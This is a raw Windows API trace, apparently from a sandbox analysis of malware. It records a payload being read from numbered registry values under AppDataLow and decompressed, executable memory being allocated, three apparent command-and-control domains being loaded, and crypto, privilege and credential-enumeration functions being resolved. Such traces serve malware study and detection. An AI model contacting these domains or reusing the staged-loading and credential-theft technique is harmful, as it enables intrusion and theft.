	[0076.347] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0076.347] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.356] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x203fc7c, lpData=0x40a0048, lpcbData=0x203fc88*=0x7d000 | out: lpType=0x203fc7c*=0x3, lpData=0x40a0048*, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.418] RegCloseKey (hKey=0x23c) returned 0x0
	[0076.511] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_6") returned 10
	[0076.511] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0076.511] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.520] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x203fc7c, lpData=0x40a0048, lpcbData=0x203fc88*=0x7d000 | out: lpType=0x203fc7c*=0x3, lpData=0x40a0048*, lpcbData=0x203fc88*=0x7d000) returned 0x0
	[0076.533] RegCloseKey (hKey=0x23c) returned 0x0
	[0076.688] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_7") returned 10
	[0076.688] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0076.688] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x3, lpData=0x0, lpcbData=0x203fc88*=0x55832) returned 0x0
	[0076.694] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x203fc7c, lpData=0x40a0048, lpcbData=0x203fc88*=0x55832 | out: lpType=0x203fc7c*=0x3, lpData=0x40a0048*, lpcbData=0x203fc88*=0x55832) returned 0x0
	[0076.704] RegCloseKey (hKey=0x23c) returned 0x0
	[0076.797] wsprintfW (in: param_1=0x203fcd8, param_2="%s_%d" | out: param_1="gpscsdch_8") returned 10
	[0076.797] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x203fc88, lpdwDisposition=0x0 | out: phkResult=0x203fc88*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0076.797] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_8", lpReserved=0x0, lpType=0x203fc7c, lpData=0x0, lpcbData=0x203fc88*=0x0 | out: lpType=0x203fc7c*=0x0, lpData=0x0, lpcbData=0x203fc88*=0x0) returned 0x2
	[0076.797] RegCloseKey (hKey=0x23c) returned 0x0
	[0076.798] RegCloseKey (hKey=0x238) returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.798] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] GetLastError () returned 0x0
	[0076.799] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0076.799] GetProcAddress (hModule=0x77960000, lpProcName="RtlDecompressBuffer") returned 0x779d6b80
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.882] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.883] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.884] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.885] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.886] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.887] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.888] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.889] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.890] GetLastError () returned 0x0
	[0076.891] GetLastError () returned 0x0
	[0076.891] GetLastError () returned 0x0
	[0076.891] GetLastError () returned 0x0
	[0076.891] GetLastError () returned 0x0
	[0076.891] GetLastError () returned 0x0
	[0076.891] GetLastError () returned 0x0
	[0080.487] GetLastError () returned 0x0
	[0082.191] lstrcpyA (in: lpString1=0x4957e90, lpString2="drk.fm604.com" | out: lpString1="drk.fm604.com") returned="drk.fm604.com"
	[0082.191] lstrcpyA (in: lpString1=0x4957eb0, lpString2="drk.fm604.com" | out: lpString1="drk.fm604.com") returned="drk.fm604.com"
	[0082.191] lstrcpyA (in: lpString1=0x4957ed0, lpString2="it.sunballast.de" | out: lpString1="it.sunballast.de") returned="it.sunballast.de"
	[0082.191] lstrcpyA (in: lpString1=0x4957ef0, lpString2="gtdspr.space" | out: lpString1="gtdspr.space") returned="gtdspr.space"
	[0082.245] GlobalAddAtomW (lpString="LtUMqQ7WiX") returned 0xc18e
	[0082.245] VirtualAlloc (lpAddress=0x0, dwSize=0x595000, flAllocationType=0x3000, flProtect=0x40) returned 0x4a40000
	[0082.313] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x74aa0000
	[0082.326] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExA") returned 0x74abf500
	[0082.327] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExA") returned 0x74abf790
	[0082.327] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCloseKey") returned 0x74abf620
	[0082.327] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenProcessToken") returned 0x74abf520
	[0082.327] GetProcAddress (hModule=0x74aa0000, lpProcName="GetTokenInformation") returned 0x74abf370
	[0082.327] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExA") returned 0x74ac0a20
	[0082.327] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExA") returned 0x74abfa60
	[0082.328] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptExportKey") returned 0x74abfb30
	[0082.328] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptAcquireContextW") returned 0x74ac0590
	[0082.328] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptSetProvParam") returned 0x74ad6c90
	[0082.328] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptReleaseContext") returned 0x74ac0650
	[0082.328] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGenRandom") returned 0x74ac10a0
	[0082.329] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x74abcbe0
	[0082.329] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGenKey") returned 0x74ac3910
	[0082.329] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptDestroyKey") returned 0x74ac0400
	[0082.329] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGetUserKey") returned 0x74ad6c30
	[0082.329] GetProcAddress (hModule=0x74aa0000, lpProcName="IsValidSecurityDescriptor") returned 0x74ad7070
	[0082.329] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupPrivilegeValueW") returned 0x74abe430
	[0082.330] GetProcAddress (hModule=0x74aa0000, lpProcName="AdjustTokenPrivileges") returned 0x74ac0980
	[0082.330] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeSecurityDescriptor") returned 0x74abfc00
	[0082.330] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74abf830
	[0082.330] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeAcl") returned 0x74abfa80
	[0082.330] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorSacl") returned 0x74ac2a20
	[0082.330] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExW") returned 0x74abf330
	[0082.331] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExW") returned 0x74abfa20
	[0082.331] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryInfoKeyW") returned 0x74abf640
	[0082.331] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteKeyW") returned 0x74ac04f0
	[0082.331] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteValueW") returned 0x74ac0fb0
	[0082.331] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenCurrentUser") returned 0x74ac1080
	[0082.331] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumValueW") returned 0x74abf680
	[0082.332] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExW") returned 0x74abf350
	[0082.332] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumKeyExW") returned 0x74abf470
	[0082.332] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExW") returned 0x74abf7f0
	[0082.332] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGetHashParam") returned 0x74abf7d0
	[0082.332] GetProcAddress (hModule=0x74aa0000, lpProcName="CredFree") returned 0x74ac3930
	[0082.332] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumKeyExA") returned 0x74ac1810
	[0082.333] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptAcquireContextA") returned 0x74ac0630
	[0082.333] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptCreateHash") returned 0x74abfa00
	[0082.333] GetProcAddress (hModule=0x74aa0000, lpProcName="RegEnumValueA") returned 0x74ac1e70
	[0082.333] GetProcAddress (hModule=0x74aa0000, lpProcName="CredEnumerateA") returned 0x74ad6670
	[0082.333] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptDestroyHash") returned 0x74ac02a0
	[0082.333] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptHashData") returned 0x74abfb10
	[0082.334] GetProcAddress (hModule=0x74aa0000, lpProcName="DeregisterEventSource") returned 0x74ab8570
	[0082.334] GetProcAddress (hModule=0x74aa0000, lpProcName="RegisterEventSourceA") returned 0x74ac1570
